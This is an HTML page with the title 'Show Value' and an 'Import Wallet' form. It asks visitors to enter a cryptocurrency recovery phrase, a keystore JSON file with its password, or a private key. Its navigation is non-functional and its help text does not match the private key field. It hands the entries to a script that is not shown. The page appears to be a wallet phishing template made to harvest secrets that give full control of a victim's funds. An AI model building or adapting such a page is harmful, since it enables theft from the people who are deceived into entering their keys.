<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="theme-color" content="#00a7ff">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="/fontawesome-free-6.0.0-beta2-web/fontawesome-free-6.0.0-beta2-web/css/solid.min.css">
    <link rel="stylesheet" href="/fontawesome-free-6.0.0-beta2-web/fontawesome-free-6.0.0-beta2-web/css/fontawesome.min.css">
    <link rel="stylesheet" href="/style/wallet.css">
    <link rel="stylesheet" href="/font-awesome-4.7.0/font-awesome-4.7.0/css/font-awesome.min.css">
    <link rel="icon" href="/logo.svg">
    <title>Show Value</title>
    <style>
       
        .c {
            display: none;
        }
        .c.active {
            display: block;
        }
         
        body {
    width: 100%;
    font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
}
header {
    width: 100%;
}
.header {
    padding: 23px;
    color: rgb(88, 120, 188);
    text-decoration: none;
    font-weight: 550;
    font-size: 16px;
    width: 90%;
    margin: 0 auto;
    margin-bottom: 0px;
    display: flex;
    justify-content: space-between;
    padding-bottom: 0;
}
.logo img {
    width: 100px;
}
.col-1 {
    font-size: 1.4rem;
}
.head h2 {
    font-weight: 650;
    font-size: 20px;
    margin: 4rem 0 0 0;
}
footer {
    margin-top: 90px;
    
    padding: 2rem 0;
    padding-bottom: 0;
    width: 100%;
}
footer .footer {
    width: 100%;
    display: flex;
    justify-content: center;
    
}
li {
    padding-bottom: 1rem;
    list-style-type: none;
}

li a {
    text-decoration: none;
    color: rgb(43, 88, 141);
    font-size: 1rem;
    color: rgb(88, 112, 135);
    font-weight: 400;
    font-stretch: normal;
}
li i {
    padding-right: .5rem;
}
.btns {
    width: 100%;
    
}
.content {
    width: 90%;
    margin: 0 auto;
}
button::placeholder {
    font-family: monospace;

}
button {
    color: black;
}
a {
    text-decoration: none;
}
@media only screen and (max-width: 768px) {
    .col-1 {
        font-size: 1.2rem;
    }
    .logo img {
        width: 60px;
    }
    .header {
        width: 98%;
    }
    .header {
        font-size: 16px;
    }
    .head h2 {

        text-align: center;
    }
    .conm img {
                width: 90%;
            }
}
    </style>
</head>
<body>
    <header>
        <div class="header">
            <div class="col-1">GitHub</div>
            <div class="col-1">Docs</div>
            <div class="logo">
               <a href="/index.html"> <img src="/logo.svg" alt="logo"></a>
            </div>
            <div class="col-1">Wallets</div>
            <div class="col-1">Apps</div>
        </div>
    </header>
    <div class="container"> 
        
        <div class="head">
           
        <h2 >
           Import Wallet
        </h2>
    </div>
    <!-- style="font-size: 14px; color: black; " -->
    <div class="btns" id="btns">
    <div class="key-cont">
        <button data-id="mission" id="phrasse" class="re">Phrase</button>
    </div>
    <div class="key-cont">
        <button  data-id="vision" id="json">Keystore JSON</button>
    </div>
   <div class="key-cont">
    <button   data-id="goal" id="key">Private Key</button>
   </div>
</div>

<div class="content">
    <div class="c cont-1 active" id="mission">
        <input type="text" placeholder="Phrase" id="txt1" required>
            <p>
                Typically 12(sometimes 24) words separated by a single spaces
            </p>
            <input type="button" value="Import" id="import">
    </div>
    <div class="c cont-2" id="vision">
        <input type="text" placeholder="Keystore JSON" id="txt2" required>
            <br>
            <input type="password" placeholder="Password" id="pwd" required>
            <p>
                Several lines of text beginning with "{...}" plus the password you used to encrypt it.
            </p>
            <input type="button" value="Import" id="import">
    </div>
    <div class="c cont-3" id="goal">
        
        <!-- <input style="padding-bottom: 1.3rem; padding-top: .5rem;" type="text" placeholder="Private Key"  class="modify" required> -->
        <input style="padding-bottom: 1.3rem; padding-top: .5rem;" type="text" placeholder="Private Key" class="Jesuskey" required>
            <p>
                Typically 12 (sometimes 24) words separated by a single space.
            </p>
            <input type="button" value="Import" id="import">
    </div>
</div>
 </div>
<footer>
    <div class="footer">
        <ul>
            <li><a href="#">
                <i class="fa fa-link"></i>
                Discord</a></li>
            <li><a href="#">
                <i class="fa fa-telegram"></i>Telegram</a></li>
            <li><a href="#">
                
                <i class="fa fa-twitter"></i>Twitter</a></li>
            <li><a href="#">
                <i class="fa fa-github"></i>GitHub</a></li>
        </ul>
    </div>
</footer>
<script src="/scripts/wallet.js"></script>
</body>
</html>